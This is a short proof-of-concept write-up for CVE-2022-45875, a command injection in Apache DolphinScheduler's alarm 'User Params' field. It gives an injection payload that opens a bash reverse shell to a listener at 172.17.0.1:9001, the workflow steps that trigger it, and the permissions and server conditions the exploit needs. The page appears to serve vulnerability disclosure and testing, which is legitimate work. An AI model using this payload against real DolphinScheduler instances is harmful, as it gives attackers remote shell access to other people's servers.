Introduction

Improper Input Validation leads to command injection/RCE in #Apache #DolphinScheduler has been found and registered as #CVE-2022-45875 We already published the analysis blog for this CVE, breaking down what’s going behind the scenes, you can check it from here: https://www.vicarius.io/vsociety/blog/cve-2022-45875-apache-dolphinscheduler-vulnerable-to-improper-input-validation-leads-to-rce

Remote Code Execution PoC

• Supposing you already found an alarm you can edit or create a new one.
• Add the following payload '; echo "sh -i >& /dev/tcp/172.17.0.1/9001 0>&1"|bash;# to the “User Params”
• Run your listener
• There are two ways to lunch the exploit now
  • Go to “Projects>Click on the project name>Worflow Definition>Start” This is already mentioned in the analysis blog.
  • Go to “Projects>Click on the project name>Worflow instance>Rerun”  

NOTES

1. Usually, when you access Apache DolphinScheduler you will find tenants, alarms, and project, workflows are ready.
2. You need to make sure that you have the permissions to edit the alarm so you can add your payload, and at least run workflow so you can decide which alarm group will run for notification. if you can run a workflow and choose the alarm group that includes the malicious one, you will be able to exploit it.
3. You need a script that exists in the server already, so when the alarm gets triggered it will trigger the payload as well because there are multiple checks and one of them check if the script file exists or not. for more information about this check the analysis blog.